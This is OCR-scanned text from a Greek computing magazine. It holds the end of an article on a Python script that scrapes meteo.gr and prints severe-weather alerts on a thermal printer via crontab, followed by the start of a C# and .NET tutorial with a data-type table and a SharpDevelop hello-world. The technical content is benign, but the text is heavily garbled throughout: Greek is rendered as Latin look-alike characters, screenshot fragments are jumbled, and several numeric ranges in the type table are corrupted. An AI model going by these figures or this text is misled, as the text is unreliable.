παράγει το meteo. Ακολουθούν μερικὲς ΒΡΑΧΥΠΡΟΘΕΣΜΗ ΠΡΟΓΝΩΣΗ 
ρυθμίσεις για τον εκτυπωτή που πιστεύ- 
ουμε ὁτι δεν χρειάζονται επεξήγηση. ΧΙΟΣ 


Γραμμές 29 και 30. Εδὠ ορίζεται µια ΜΉΝ 
µικρή αλλά ἄκρως αποτελεσματικἠ ou- Παρ 19/12 13 
νάρτηση, µε τη βοήθεια της οποίας ano- 0:06 KAC 
μακρύνονται όλα τα HTML tags ano το 
εισερχὀµενο "κείμενο". Ουσιαστικά, όλη 
η δουλειὰ πραγματοποιείται ano μία 
ἄλλη συνάρτηση (sub), η οποία ανήκει 
στη βιβλιοθήκη των κανονικών εκφρά- 
σεων (re). Η συνάρτηση sub (ano το 
substitute) npayyatonolei αντικαταστά- 
σεις και υποστηρίζει τη χρήση κανονικών 
εκφράσεων. 


Γραμμές 32 Ewe 39. Η δεύτερη συνάρ- 
τηση που περιλαμβάνει το πρὀγραμμἁ 
μας, μετατρέπει τους ελληνικούς χα- 
ρακτήρες σε λατινικούς. Με ἆλλα λὀό- 
για, πραγµατοποιεἰ τη "μετάφραση" σε 
greeklish. Πα να γίνει αυτό έχουμε opi- 


i { é H εκδοχή mobile του meteo.gr. Ano εδώ θα 
σει µια λίστα με όλους του ελληνικούς αντλούμε την πρὀγνωση για τον καιρὀ. 


χαρακτήἠρες και μία ακόµα µε τους αντἰ- 

στοιχους λατινικούς. Αυτές οι δύο λίστες συνενώνονται σε µια δομή λεξικού, µε 
τη βοήθεια της συνάρτησης zip. H μετατροπή auth καθ' αυτὴ συντελείται and Eva 
βρόχο, στις γραμμὲς 37 και 38. 


Γραμμές 41 Ewe τέλος. H συνάρτηση που ορἰζεται εδὠ (main) αποτελεί τη paxo- 
KOKGAIG του προγρἀμματὸς µας. Στις πρῶτες τρεις γραμμὲς (42 ἑως 44) πραγματο- 
ποιούμε µια σύνδεση προς το URL που έχουμε δώσει στη σχετική µεταβλητή-ρύθ- 
μιση του προγράµµατος, ano ὁπου και θα λάβουμε την πρόγνωση του καιρού. Το 
περιεχόµενο που λαμβάνουμε εἶναι µια σελίδα HTML κι αποθηκεύεται στη μεταβλητή 
content. Στις επόμενες δύο γραμμές (45 και 46) ορίζονται οι μεταβλητές start και 
end. H πρώτη δείχνει τη θέση στην οποία ξεκινούν οι χρήσιμες πληροφορίες EVTOG 
της σελίδας HTML, ενώ η δεύτερη δείχνει τη θέση στην οποία τελειώνουν. Όπως 
βλέπετε, οι σχετικὲς θέσεις εντοπἰζονται µε τη βοήθεια της συνάρτησης find, η οποία 
πραγματοποιεί αναζητήσεις. Αμέσως μετὰ ορἰζουμε τη μεταβλητή htmitext, η οποία 
περιλαμβάνει μόνο το "ωφέλιμο" τµήµα της σελίδας HTML. Ano αυτὸ το τµήµα ano- 
μακρύνουμε όλα Ta HTML tags κι αποθηκεύουµε το "καθαρό", πλέον, κείµενο στη 
μεταβλητή plaintext. Στις επόμενες γραμμὲς (49 και 50) αντικαθιστούμε κάποιους 
χαρακτήρες που δεν υποστηρίζονται ano τη βιβλιοθήκη 65ερο5 µε ορισμένους ἆλ- 
λους, που υποστηρίζονται. Έτσι, αν χρειαστεἰ αργότερα να τυπώσουμε κάποια εἰδο- 
ποίηση, δεν θα προκύψει κανένα πρὀβλημα. Επιπρὀσθετα, εισάγοντας το χαρακτήρα 
του EKBETN (^) θα εἴμαστε σε θέση να διαχωρίζουµε εὐκολα τις αριθμητικἑςτιμὲς απὸ 
τις μονάδες μέτρησης ;) 
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Σε αυτό το σημείο του προγράμματος έχουμε NAPE! Eva κείµενο που περιέχει τη Bpa- 
χυπρόθεσµη πρὀγνωση του καιρού και εἶναι απαλλαγμένο ano τα HTML tags. Ωστό- 
σο, το ἴδιο κείμενο εἶναι γεμάτο µε περιττὲς αλλαγές γραμμῶν, κενούς χαρακτήρες 
και tabs. Πα να διορθώσουμε αυτό το πρὀβλημα, ξεκινάμε διασπώντας το κείμενο 
σε ξεχωριστἐς γραμμές (γραμμὴ 51). Στη συνέχεια δημιουργούμε µια κενἠ λίστα 
(γραμμή 52) και µε τη βοήθεια του βρὀχου που ακολουθεί (γραμμές 54 ἑως 57) Tono- 
θετούμε σ' GUTH τις γραμμὲς του κειµένου που *dSEv* εἶναι κενές. Παρατηρεἰστε oT! 
πριν τσεκάρουμε για το αν µια γραμμὴ εἶναι κενἠ και για το αν πρέπει va προστεθεἰ 
στη λίστα µας ἡ ὀχι, ἐχει προηγηθεἰ το φιλτράρισμα της γραμμῆς ano τη συνάρτηση 
strip. Με αυτόν τον τρόπο απομακρύνονται όλα τα κενὰ και τα tabs. 


Θα περἰμενε κανεὶς ὁτι κάπου εδώ ολοκληρώνεται το OTPIPVO τμήμα TOU κὠδικα. 
Εφόσον ἐχουμε την πρόγνωση σε απλὀ κείμενο, GNGAAGYHEVO ano περιττοὺς xapa- 
κτήρες, η περαιτέρω επεξεργασία δεν θα μπορούσε να εἶναι δύσκολη. Τα φαινόμε- 
να ὁμως απατούν κι ο κὠδικας που ακολουθεί χρειάζεται λίγη παραπάνω προσοχὴ. 
Θυμηθείτε ὁτι για την απομάκρυνση των περιττὠν χαρακτήρων σπάσαμε το κείμενο 
σε ξεχωριστὲς γραμμές. Στην αρχικἠ του μορφή, το κείμενο εμφάνιζε πέντε OTOI- 
χεία avd γραμμή: Ημερομηνία, wpa, θερµοκρασία, καιρικὀ Φαινόμενο και δύναμη/ 
κατεύθυνση ανέμου. Τώρα, καθένα απ' αυτά τα στοιχεία βρίσκεται σε ξεχωριστἠὴ 
γραμμὴ. Επομένως, για να εξετάσουμε αν η πρὀγνωση µιας ημέρας περιλαμβάνει 
κάποιο ακραΐο φαινόμενο, η εξἐταση των γραμμών πρέπει να γίνεται σε πεντάδες. 
Ακριβώς γι’ αυτό το λὀγο, στη γραμμὴ 62 δημιουργούμε τον πἰνακα forecast, που 
μπορεί να φιλοξενεὶ πέντε συμβολοσειρές (strings). O βρόχος στις γραμμές 64 ἑως 
67 αναλαμβάνει να γεμίζει τον πίνακα forecast µε τις πέντε γραμμὲς που απαρτίζουν 
την πρόβλεψη µιας ημέρας, αφού προηγουμένως "μεταφράσει" το περιεχόμενο κάθε 
γραμμὴς σε greeklish. Μέσα στον ἰδιο βρὀχο, κάθε φορά που ο nivakac forecast 
γεμίζει (κάθε φορά που ο μετρητὴς i αποκτά την τιµή 4), πραγματοποιείται ¿vag 
ἐλεγχος για τον EVTONIOHO ακραϊων καιρικὠν συνθηκών. Στην περίπτωση που εντο- 
πιστεὶ κάτι τέτοιο, ολόκληρη η τρέχουσα πρὀβλεψη (ολόκληρη η πεντάδα γραμμών) 
προστίθεται στη μεταβλητή printline κι αυτή µε τη σειρἁ της προστίθεται στη µετα- 
βλητὴ printdoc. Ὅπως αντιλαμβάνεστε, η συγκεκριμένη μεταβλητή περιλαμβάνει To 
προς εκτύπωση μήνυμα. 


Στη γραμμή 89 τσεκάρουμε αν η μεταβλητή printdoc εἶναι kevi ἡ ὀχι. Αν εἶναι κενή, 
θεωρούμε OT! δεν εντοπἱστηκε κανένα αξιοσημείωτο καιρικὀ φαινόμενο. Ἔτσι το 
πρόγραµµα δεν εκτυπώνει τίποτα και τερματίζεται. Αν η μεταβλητή printdoc δεν 
εἶναι κενἠ, δημιουργούμε το αντικείµενο Epson, που ανήκει στην κλάση printer της 
βιβλιοθήκης escpos. Στη συνέχεια, µε τη βοήθεια αυτού του αντικειμένου και των 
σχετικὠν μεθόδων, εκτυπώνουμε την ειδοποίηση µε TO ἐκτακτο καιρικὀ δελτίο ;) 


Επαναλαμβανόμενη εκτέλεση 


Όπως θα προσέξατε, το πρὀγραμμὰ µας δεν λειτουργεἰ επαναλαμβανόμενα. Λαμβά- 
νει Ἁμιαξ πρόγνωση του καιρού, πραγματοποιεί τους ελέγχους που έχουμε επιβάλει, 
τυπώνει το κατάλληλο μήνυμα εφόσον κάτι τέτοιο κριθεἰ απαραίτητο και τερματίζε- 
ται ησύχως. Επομένως, για την ολοκλήρωση της κατασκευἠς πρέπει να φροντίσουμε 
για την αυτόματη εκτέλεση του προγράμματος σε τακτά χρονικά διαστήματα. Κάτι 
τἐτοιο μπορεί να γίνει πανεύκολα µε τη βοήθεια Tou crontab. Ας δούµε Eva παρά- 
δειγµα ρύθμισης για την επαναλαμβανόμενη εκτέλεση του προγρὰἀμματὸς µας. Κατ' 
αρχάς, πρέπει ν' ανοἰξουµε το αρχείο ρυθμίσεων του crontab πληκτρολογώντας 
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ια 


crontab -e 
Στη συνέχεια οφείλουμε να προσθέσουμε µια γραμμὴ σαν την ακόλουθη: 
00 06 Ἐ * * python /path/to/meteo-reporter. py 


Αφού αποθηκεύσουµε το αρχείο και βγούμε ano Tov editor, To πρὀγραμμά µας 
(meteo-reporter) θα αρχίσει να εκτελεἰται αυτόματα και σε καθηµερινἠ βάση, στις 
ἐξιτο πρωΐ. Φυσικά, θα μπορούσαμε να εἰχαμε επιβάλει την εκτέλεση του προγράμ- 
ματος και µε μεγαλύτερη συχνότητα. Να σημειώσουμε εδώ ὁτι TO meteo ανανεώνει 
τις προβλέψεις του avd δύο ώρες. 


H δικἠ µας οπτικἠ 


Το συστηματάκι µας μπορεί να τυπώνει ειδοποιήσεις για κάθε επικἰνδυνο KAIPIKO 
φαινόμενο, εξετάζοντας αδιάλειπτα το δελτίο καιρού and το meteo.gr. Πα κάποιους 
ανθρώπους αυτἠ η κατασκευἠ ενδέχεται να μοιάζει εντελὼς άχρηστη, αλλά στα δικἁ 
μας μάτια φαντάζει εξωτικἡ και σίγουρα διασκεδαστική! Εξάλλου, η εργασἰα που 
προηγήθηκε ἦταν ενδιαφέρουσα και µας προσέφερε τη δυνατότητα να αποκτήσουμε 
άφθονες νέες γνώσεις. AUTO δεν σημαίνει ὁτι ο κὠδικας που γράψαμε εἶναι τέλειος, 
OUTE ὁτι τον αντιμετωπίζουμε ως τέτοιον. Το πρὀγραμμἁ µας θα μπορούσε να δεχτεἰ 
πολλὲς βελτιώσεις και προσθήκες. Όλα αυτά όμως θα τα αφήσουμε σ' εσάς ;) EAni- 
ζουμε να δούμε σύντομα τις δικὲς σας υλοποιήσεις. 


SAB 20/12 20 

KYR 21/12 02:00 
KYR 21/12 08:00 
KYR 21/12 14:00 
KYR 21/12 20:00 
DEY 22/12 02:00 11 


## END OF THE REPORT ## 


Μια εκτύπωση µε την καιρικἠ πρὀγνω- 
ση για τις επόμενες μέρες. O θερµικὀς 
εκτυπωτής συνεργάζεται µε Το Προ- 
γραμματάκι µας άψογα! 


1. Μπορείτε να διαβάσετε περισσότερα για To crontab στη σελἰδα 59 του τεύχους 016. 
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Ανάπτυξη εφαρμογών σε C# για To .NET [μέρος 1ο] 


Στη σειρά που ξεκινά µε το παρὀν άρθρο μαθαίνουμε να αναπτύσσουμε 
εφαρμογές εὐκολα και γρήγορα, για την πλατφόρμα .NET της Microsoft. H 
γλῶσσα στην οποία θα στηριχτούµε εἶναι η συνεχώς εξελισσόμενη C#. Ki av 
νομίζετε OTI οι προηγούμενες προτάσεις αποτελούν κάποια εορταστικἠ φάρσα 
κοσμικών διαστάσεων, συνεχίστε την ανάγνωση και να εἴσαστε σίγουροι ότι στο 
τέλος θα σας διαψεύσουμµε ευχάριστα. 
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AvantuEn εφαρμογών σε ΓΗ για to .NET Γµέρος Ίο] 


ή” ”““”“ 


Αν εξαιρέσουμε εκείνους που δεν ἐχουν καθἰσει NOTE μπροστά σε υπολογιστή, εἶναι 
ελάχιστοι οι κάτοικοι του πλανήτη που δεν γνωρίζουν τη γλὠσσα προγραμματισμού 
Java. Πρόκειται για µια γλὠσσα που αναπτύχθηκε µε το στὀχο να εἶναι σύγχρο- 
vn, υψηλού επιπέδου, πλήρως αντικειµενοστραφἠς και φορητή. Με τον τελευταίο 
ὁρο εννοούμε ὁτι τα παραγόμενα προγράμματα τρέχουν σε οποιαδήποτε πλατφὀρ- 
μα υπάρχει εγκατεστημένη η ομώνυμη εικονικἠ μηχανἠ (JVM ano To Java Virtual 
Machine). Ουσιαστικά, το JVM εἶναι Eva ενδιάμεσο στρώμα λογισμικού, μεταξύ των 
προγραμμάτων της Java και του λειτουργικού συστήματος. Η Java, βέβαια, av και 
έφερε µια επανάσταση στο χώρο των frameworks, δεν μπόρεσε να τηρήσει ὀλες τις 
υποσχέσεις της. Ως γλὠσσα δεν κατάφερε ποτὲ να γίνει ολοκληρωτικἁ πλήρως αντι- 
κειµενοστραφής, καθώς οι λεγόμενοι βασικοί τύποι δεδομένων', οι οποίοι δεν ano- 
τελούν αντικείμενα, εμπεριέχονται στο συντακτικὀ της. Εξάλλου, οὐτε και η συµβα- 
τότητα µε κάθε πλατφόρμα στην οποία τρέχει το JVM επιτεύχθηκε πλήρως. Κάπως 
ἐτσι, ἄλλωστε, οι επικριτὲς της γλὠσσας κατέληξαν να παραφράσουν το σύνθημα 
"Write once, run everywhere" σε "Write once, test everywhere". Τη χαριστικἠ βολἠ 
στην πλατφόρμα έφερε η εξαγορά της Sun ano την Oracle, καθώς η νέα ιδιοκτήτρια 
επέδειξε μηδαμινὸ ενδιαφἐρον για την περαιτέρω εξέλιξη της γλὠσσας. Αλλά µια 
στιγμή: για το .NET και την Οὔ δεν υποσχεθήκαμε ὁτι θα μιλήσουμε; Ἐννοια σας, και 
δεν το ξεχάσαμε! Ξεκινήσαμε µε τη Java γιατί το «ΝΕΤ framework ἐχει επηρεαστεί 
σε μεγάλο βαθμό ano τις ιδέες των δημιουργῶν της Java, ενώ και η γλὠσσα C# ἐχει 
δεχτεἰ πολλὲς επιρροὲς απὀ το συντακτικὀ της προαναφερθεἰσας. 


Μια σχέση που δεν ἦταν για να κρατήσει 


Αν και η Microsoft εἶχε πάρει ἀδεια ano τη Sun για την ανάπτυξη µιας ειδικἠς εκδο- 
χἠς του JVM για τα Windows, η Sun έφτασε να κάνει μηνύσεις και τελικἁ διέκοψε τη 
συνεργασία. Τα παράπονα της Sun δεν ἦταν εντελὼς αδικαιολόγητα, αλλά τώρα πια 
εἶναι εντελώς αδιάφορα. Σημασία ἐχει ότι η Microsoft δεν εγκατέλειψε τους καρπούς 
των προσπαθειών της και μετονόμασε την πλατφόρμα που εἶχε αναπτύξει και την 
αντίστοιχη γλὠσσα σε J++. Αυτή η κίνηση ὀχι μόνο δεν εξομάλυνε την κατάσταση 
αλλά την οδήγησε στα ἄκρα, καθώς η Sun ένιωθε ὁτι θα ἐχανε τον ἐλεγχο TOU NVEU- 
ματικού της παιδιού. 


Πάντως, ανεξάρτητα απὀ τις στρατηγικὲς επιλογὲς των δύο εταιρειών, η αλήθεια 
εἶναι ότι η πλατφόρμα της Java παρουσίαζε αρκετές αδυναμίες. Τα προγράµµατα σε 
Java ἐτρεχαν πολύ πιο αργά ano εκείνα που εἶχαν γραφτεί σε ἄλλες γλὠσσες και 
εἶχαν µεταγλωττιστεί για Windows, ενώ η συνεργασία ενὸς προγράµµατος σε Java 
µε Eva npoypauua που εἶχε γραφτεί σε GAAN γλὠσσα ἦταν εξαιρετικἁ περιορισμένη 
και πρακτικά αδύνατη! Τέλος, πολλά προβλήματα υπήρχαν και στον τομέα της OXE- 
δἰασης/υλοποίησης των GUI. Π' αυτό το σκοπὀ προσφέἑρονταν τρεις διαφορετικὲς 
βιβλιοθήκες, που εκτὸς του ὁτι παρουσίαζαν µια ἐντονη αισθητικἠ διαφοροποίηση 
χαρακτηρἱζονταν κι ano χαμηλἠ ταχύτητα απὀκρισης. 

H Microsoft διέβλεπε τα αδιέξοδα αυτής της κατάστασης και επἐλεξε να κάνει Eva 
βήμα μεγάλης στρατηγικἠς σημασίας: Τερμάτισε κάθε σχέση µετη Sun Microsystems 
και δημιούργησε Eva εξ ολοκλήρου δικὀ της framework. 


1. Έτσι ονομάζονται οι τύποι bool, byte, int, long, float, double και char, οι οποίοι αντιπροσωπεύουν δυαδικὲς τιµές, ακἐραιους, δεκαδικοὐς και 
μεμονωμένους χαρακτήρες αντίστοιχα. 
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C# VB.NET J# 


code code code 
Compiler Compiler Compiler 
ος. Common Language Infrastructure -------- ` 


μή Ϊ 


ΝΕΤ compatible languages compile to a 


Common second platform-neutral language called 
Intermediate Common Intermediate Language (CIL). 
Language 


The platform-specific Common Language 


| Common F ; : 
Runtime (CLR) compiles CIL to machine- 
Language readable code that can be executed on the 
——E current platform. 
01001100101011 ; 
11010101100110 : 


------------------------------------------------4΄ 


O τρόπος λειτουργίας Tou .NET framework: O compiler κάθε γλὠσσας παράγει αρχεία που 
περιέχουν κώδικα CIL. Αυτός ο κώδικας μεταφράζεται σε γλὠσσα μηχανής µε τη βοήθεια του 
CLR κι εκτελείται ano Το hardware του υπολογιστή. 


68 


Βνάπτιξη εφαρμογών σε ΓΗ για to .NET Γµέρος Ίο] 


ο ώώμώώώώ”””“” 


Και εγένετο το .NET 


Το .NET framework επιτρέπει την ανάπτυξη, την εκτέλεση και τη συνεργασία των 
προγραμμάτων, ανεξάρτητα ano τη γλῶσσα στην οποία ¿xouv γραφτεί. Όπως και 
στην περίπτωση της Java, τα προγράμματα που παράγονται ano το .NET framework 
δεν αποτελούνται and κὠδικα μηχανἠς για τους αληθινούς επεξεργαστὲς. Αντίθετα, 
αποτελούνται απὀ κώδικα σε µια γλὠσσα που ονομάζεται CIL (Common Intermediate 
Language)? και η οποία εκτελεἰται ano µια μηχανὴ που ἐχει τ' ὀνομα CLR (Common 
Language Runtime). H συγκεκριμένη μηχανὴ εἶναι πολύ πιο γρήγορη ano το JVM, 
μεταφράζει τον κὠδικα CIL σε machine code µε μια τεχνική που ονομάζεται JIT (Just 
In Time) και αναλαμβάνει κάθε εργασία που σχετίζεται µε τη διαχείριση της μνήμης 
και τον καθαρισμὸ ano ἄχρηστα αντικείμενα (garbage collection). 


Προηγουμένως αφήσαμε να εννοηθεἰ ὁτι το «ΝΕΤ "αδιαφορεί" για τη γλὠσσα στην 
οποία εἶναι γραμμένα τα διάφορα προγράμματα. Κάτι τέτοιο όμως δεν εἶναι απόλυτα 
ακριβές. Το .NET συνεργάζεται µε τις γλὠσσες προγραμματισμού που ακολουθούν 
το πρὀτυπο CLS (Common Language Specification) και υποστηρίζουν τους τύπους 
δεδοµένων που περιγράφονται στο CTS (Common Type System). Πάντως, η επικοι- 
νωνία των εφαρμογών μεταξύ τους δεν περιορἰζεται µε κανέναν τρόπο. Οἱ εφαρ- 
μογὲς που έχουν γραφτεί για το «ΝΕΤ framework συνεργάζονται άψογα ακόμα και 
µε εκεἰνες που εἶναι γραμμένες αμιγώς για TO λειτουργικὀ σύστημα, µε τη βοήθεια 
προτύπων ὁπωςτα OLE, COM και COM+. Τέλος, πρέπει να πούμε ότι η Microsoft έχει 
εμπλουτίσει το .NET framework και µε µια τεράστια συλλογή βιβλιοθηκών, οι onoi- 
ες παρέχουν αντικείμενα και μεθόδους παντὀς εἰδους: Τόσο για την αντιμετώπιση 
γενικὠν προγραμματιστικὠν προβλημάτων, OOO και για το χειρισμὸ των διαφόρων 
τμημάτων του λειτουργικού συστήματος. Παράλληλα, σε Eva σύστημα επιτρέπεται 
η συνύπαρξη πολλαπλών εκδόσεων του «ΝΕΤ, γεγονὸς που αυξάνει τη συμβατότητα 
σε μεγάλο βαθμό. 


.NET για ὀλους! 


Πα πολλὰ χρόνια, η ανάπτυξη εφαρμογών για το.ΝΕΤ framework σήμαινε την εργα- 
σία αποκλειστικἁ σε Windows. Μέχρι που κάποια στιγµἠ ο Miguel de Icaza, ο npo- 
γραμματιστἠής πίσω ano το GNOME desktopn environment του Linux, δημιούργησε 
ἑναν κλὠνο του .NET. Αναφερὀµαστε στο περίφημο Mono, To onoio αποτελεί προϊόν 
Ανοιχτού Λογισμικού. Δυστυχώς, το Mono ἦταν πάντοτε πολύ πιο αργό ano το .NET 
κι ως προς τις δυνατότητες που προσέφερε ἦταν τουλάχιστον μία ἐκδοση πἰσω. 
Ωστόσο κατάφερε κάτι πολύ σηµαντικό: Ἐφερετο .NET στον κόσμο του Unix! 


Μόλις πρὀσφατα και προς μεγάλη ἐκπληξη όλων, η Microsoft ¿kave µια EvVTUNWOIAKN 
στροφἠ στη συνήθη πολιτικἠ της. Δημοσίευσε τον πηγαἰο κὠδικα των δομικών OU- 
στατικὠν του .NET framework, υπό µια ἀδεια Ανοικτού Λογισμικού. Όπως καταλα- 
βαΐνετε, Eva TETOIO βήμα προλειαίνει το ἐδαφος για το porting του «ΝΕΤ framework 
σε ὀλες τις πλατφόρμες. Σκεφτείτε ότι αρκετὲς ομάδες προγραμματιστῶν έχουν 
ἠδη πέσει µε τα μούτρα στη δουλειά, ενώ και η εταιρεία που αναπτύσσει το Mono 
(Xamarin) τρίβει τα χέρια της. Στο κοντινὸ μέλλον, το .NET framework αναμένεται 
να αποκτήσει παρουσία σε όλα τα δηµοφιλἠ λειτουργικά συστήματα. Αυτό δείχνει 
και η KUKAO@opid µιας ειδικἁ διαμορφωμένης εκδοχἠς του .ΝΕΤ για το λειτουργικὀ 
Windows Phone. Εξάλλου, η Xamarin παρουσίασε εμπορικὲς εκδοχὲς TOU Mono για 
το Android και για το iOS. Με την "απελευθέρωση" του πηγαἰου κὠδικα του «ΝΕΤ 


2. Γνωστή παλαιότερα καὶ ως MSIL (Microsoft Intermediate Language). 
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Create directory for solution 


Project will be created at C:\Users\user\Desktop \hello\hello 


Το παράθυρο για τη δημιουργία evóç νέου project. Στην εικόνα 
βλέπετε τις απλές ρυθμίσεις που κάναμε, για τη δημιουργία του 
ακόμα πιο απλού προγρἀμματόὸς µας. 


εἶναι πιθανὀ να εμφανιστούν και δωρεάν υλοποιήσεις, ενώ δεν αποκλεἰεται να δούμε 
και σχετικά προϊόντα ano τη Microsoft. 


τώρα, κάποιοι µπορεί να σκέφτονται OT! το .NET αποτελεί ¿vav Δούρειο Ίππο της 
Microsoft, για την εἰσοδό της σε νέες αγορὲἑς. E, λοιπὸν, το αν αληθεύει κάτι TETOIO 
ἡ OXI μάς αφήνει παγερὰ αδιάφορους. Σκοπὸς µας εἶναι να παρουσιάσουμε µια πλατ- 
φόρμα που αναπτύσσεται µε ταχύτατο ρυθμὀ και η υποστἠριξἠ της επεκτείνεται 
διαρκώς. Με τη βοἠθειἁ της μπορούμε να αναπτύσσουμε προγράμματα για το napa- 
θυρικὸ περιβάλλον, µε ευκολία και ταχύτητα. Δεν ξέρουμε τι ¿xouv να πουν για όλα 
αυτά οι τιτανο-αναλυτὲς των πάντων, αλλά εμάς µας ενθουσιάζουν ;) 


Μια αιχµηρή παραλλαγή της C 


Όπως εἶπαμε non, στο «ΝΕΤ μπορούμε να χρησιμοποιήσουμε οποιαδήποτε γλὠσσα 
προγραμματισμού ικανοποιεὶ τα κριτήρια του CLS και διαθέτει compiler που παράγει 
κὠδικα CIL. Τα προγράµµατα που προκύπτουν απὀ τέτοιες γλὠσσες και EXOUV τη 
μορφὴ CIL μπορούν να εκτελούνται ano το CLR κι ονομάζονται "διαχειριζόμενα". 
Υποψιαζόμαστε ὁμως ὁτι αυτές οι περιγραφὲς δεν βοηθάνε ιδιαίτερα. Πα va γἰνου- 
HE πιο σαφείς, σκεφτείτε OT! όταν θέλετε να γράψετε κάτι για το .ΝΕΤ μπορείτε va 
επιλέξετε κάποια ano τις ακόλουθες γλὠσσες: Οὔ, C++ «ΝΕΤ, Visual Basic .NET, 
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F#, Boo, IronPython, IronRubby, Eiffel κ.ἀ. Μέσα απ' òo αυτὸ το πλήθος εμεὶς ξε- 
χωρίσαμε τη 64 (προφἑρεται "C sharp"). Πρόκειται για µια γλὠσσα που ανέπτυξε 
η Microsoft στις αρχὲς της περασμένης δεκαετίας, αλλά δεν σταμάτησε NOTE va 
αναπτύσσει και να εμπλουτἰζει µε νέες δυνατότητες και χαρακτηριστικἀ. Αξίζει να 
σημειώσουμε OT! η C# αποτελεἰ την αιχμή του δόρατος για το .NET framework και 
χρησιμοποιείται περισσότερο ano οποιαδήποτε ἄλλη. H C# έχει δεχτεἰ σαφεὶς επιρ- 
ροὲς and τις γλὠσσες C, Pascal και Java. Όσοι γνωρίζετε κάποια ano αυτὲς εἶναι 
βέβαιο ὁτι θα νιώσετε αμέσως σαν στο σπίτι σας. 


Περιττὸ να πούμε ὁτι η κληρονομικότητα, η ενθυλάκωση, η υπερφόρτωση μεθόδων 
και όλες οι γνωστές EVVOIEG του αντικειμενοστραφούς προγραμματισμού, ισχύουν KA- 
νονικότατα και yia TN C#. Εξάλλου, στη C# τα *ndvta* εἶναι αντικείμενα. Κι όταν λέμε 
τα πάντα, το εννοούμε! Ακόμα και οι βασικοἰ τύποι δεδοµένων -παρ' ὁλο που η χρήση 
τους δεν παραπέμπει στον αντικειμενοστραφἡ προγραμματισμό-, αποτελούν συντο- 
μεύσεις προς αντικείμενα των κλάσεων του «ΝΕΤ framework. Έτσι, µη σας pavesi 
παράξενο αν σε µια μεταβλητή που ἐχει δηλωθεί ως int, αποφασἰσουµε να καλέσουµε 
μεθόδους ὁπως εἶναι, για παράδειγµα, η ToString(). Επιπρόσθετα, ὁπως αναφέραμε 
ἠδη, η C# υποστηρίζει και την υπερφόρτωση τελεστών. Κατά συνέπεια, η συνένωση 
δύο συμβολοσειρών µπορεί να πραγµατοποιηθεί µε χρήση του τελεστή +, ενώ στην 
πραγματικότητα καλείται η μέθοδος Concat, της κλάσης String. 


Στη συνέχεια παραθέτουμε vav πἰνακα µε τις κλάσεις του .NET που αφορούν στο 
χειρισμὸ των διάφορων τύπων δεδομένων. Όπως ενδέχεται να παρατηρήσετε, σε 
αντίθεση µε τη Java, η C# υποστηρίζει και ακἐραιους τύπους αριθμών χωρὶς πρὀ- 
σηµο, καταφέρνοντας ETO! να διπλασιάσει το διαθέσιμο εὗρος. Αυτή η λεπτομέρεια 
μπορεί να μοιάζει ασήμαντη, αλλά διευκολύνει και επιταχύνει αρκετά την επἰλυση 
ορισμένων προβλημάτων. 


Συντόµευση Κλάση Μήκος σε bit Εύρος 
byte Byte 8 ϐ έως 255 
sbyte SByte 8 -128 έως 127 


int Int32 32 -2,147,483,648 έως 2,147,483,647 
uint UInt32 32 Θ έως 4294967295 

short Int16 16 -32,768 έως 32,767 
ushort UInt16 16 Ə έως 65535 


-922337203685477508 έως 
dons Ineca ea 922337203685477507 
ulong UInt64 @ έως 18446744973709551615 
float Single -3.402823638 έως 3.402823638 


-1.797693134862326308 έως 
1.79769313486232e308 


char Char 16bit unicode 


double Double 64 


bool Boolean 8 True ή false 
object Object 


string String 
decimal Decimal +1.0 x 10e-28 έως +7.9 x 10e28 
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D | $ τ |Defautiayu- |Ñ iE o ἄν {ϑ!, 
zx |P 
Run compiled exe (does recompile) 
v || È Main(string[] args) 7 
B-E Solution hello a SA | ΕΙ 
η hello * Created by SharpDevelop. 
* User: user 
* Date: 17/12/2014 
= Time: 3:24 pp 
= 
= To change this template use Tools | Options | Coding | Edit Standard Headers. 
= 
using System; 
namespace hello 
class Program 
public static void Main(string[] args) 
Console.WriteLine("Hello, deltaHackerz!”); 
// TODO: Implement Functionality Here 


Console.Write("Press any key to continue . . . 
Console.ReadKey(true) 5 


t Line Description 


E Task List | Output 


Ιπ17 col52 ch 43 


Στο περιβόλλον εργασίας του SharpDevelop δεσπὀζει o code editor. 
Στην εικόνα φαίνεται κι ο κώδικας της πρώτης µας εφαρµογής :D 


Τέλος, πρέπει να πούμε ὁτι σε γενικὲς γραμμὲς TO συντακτικὸ της C# θυμίζει εκείνο 
της PHP. Μια σηµαντικἠ διαφορὰ αποτελεἰ η καθολικἠ χρήση του τελεστή της TE- 
λείας (.) αντί του "-»", για την προσπἐλαση των μελών των αντικειμένων. Φυσικά, 
μικρὀ- διαφορές υπάρχουν κι ἄλλες, αλλά δεν πιστεύουμε OT! αξίζει να αναλωθούμε 
σε µια εκτενἠ παρουσἰασή τους. Προτιμάμε να προχωρήσουμε την παρουσἰασἠ µας 
και να αφήσουμε τις ιδιαιτερότητες της C# να φανούν μέσα ano τη µελέτη πρακτι- 
κὠν παραδειγμάτων. 


Μικρὀ αλλά πανίσχυρο 


H ανάπτυξη ενὸς προγράµµατος σε Οὔ μπορεῖ να γίνει και µε τη χρήση ενὸς επεξερ- 
γαστἠ απλού κειμένου. Μετά τη συγγραφή και την αποθήκευση του κὠδικα πρέπει 
να τρἐξουµε τον Compiler, ο οποίος προστίθεται αυτόματα µε την εγκατάσταση του 
«ΝΕΤ framework. O compiler ονομάζεται csc (c sharp compiler) και το εκτελέσιμο Bpi- 
σκεται στη διαδρομή c:\windows\Microsoft.NET\Framework\vxX.X, ὀπου "X.X" εἶναι 
η ἐκδοση του εγκατεστηµένου «ΝΕΤ. Κατά την nepinAdvnon µας στο µαγικὀ κόσμο 
της C# και του .NET, πιστὸς µας σύμμαχος θα εἶναι το SharpDevelop. Πρόκειται για 
ἑνα IDE µε αρκετά μικρὸ μέγεθος (λιγότερο anò 50MB), το οποίο ωστόσο προσφέρει 
πολλὲς ευκολίες, εἶναι ταχύτατο και κατὰ τη γνώμη µας εἶναι τουλάχιστον ισάξιο µε 
το ογκώδες Microsoft Visual Studio. Το SharpDevelop δημιουργήθηκε ano τον Mike 
Kruger το 2000, κατὰ τις δοκιμές της πρώτης ἐκδοσης του .NET framework 1.0. 
Έκτοτε το SharpDevelop αναπτύσσεται διαρκώς, υποστηρίζει ὀλες τις εκδόσεις του 
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“ή 


C:\Users\user\Desktop\hello\hello\bin\Debug\hello.exe 


Hello, deltaHackerz? a 
Press any key to continue . 


m 


P 


Αμέσως µετά τη μεταγλώττιση KAI την εκτέλεση του προγρἀμματός 
εμφανίστηκε Eva παράθυρο της γραμμἠς εντολών των Windows (µια 
